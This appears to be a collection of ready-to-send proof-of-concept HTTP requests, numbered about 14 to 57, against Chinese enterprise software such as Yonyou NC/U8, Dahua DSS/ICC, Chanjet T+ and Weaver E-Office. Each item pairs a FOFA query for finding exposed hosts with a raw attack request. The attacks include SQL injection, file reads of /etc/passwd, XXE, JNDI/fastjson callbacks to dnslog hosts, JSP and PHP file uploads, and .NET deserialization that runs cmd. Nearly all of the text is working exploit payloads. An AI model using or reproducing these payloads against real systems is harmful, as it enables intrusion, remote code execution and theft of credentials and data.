GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
Leaked content includes usernames and passwords. This reaches the same endpoint as item 14 by a different route: an .ico name is placed in a path segment and then stepped over with ../.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC computes the MD5 of 1234 with SQL Server's HASHBYTES inside the injected expression; the 1-CONVERT(...) form forces a type-conversion error, so the hash shows up in the error message when the injection works.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua (大华) ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua (大华) ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
The body is the published fastjson probe and is deliberately not valid JSON; a DNS lookup arriving at the dnslog host shows that the parser reached the java.net.URL value.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua (大华) ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua (大华) ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
Same probe as item 21, with DNSLOG standing for your callback host.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
The fname field sets the destination path, so the .txt part is written as a .jsp under the web root.
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog


26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8


28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--


49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3337


53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
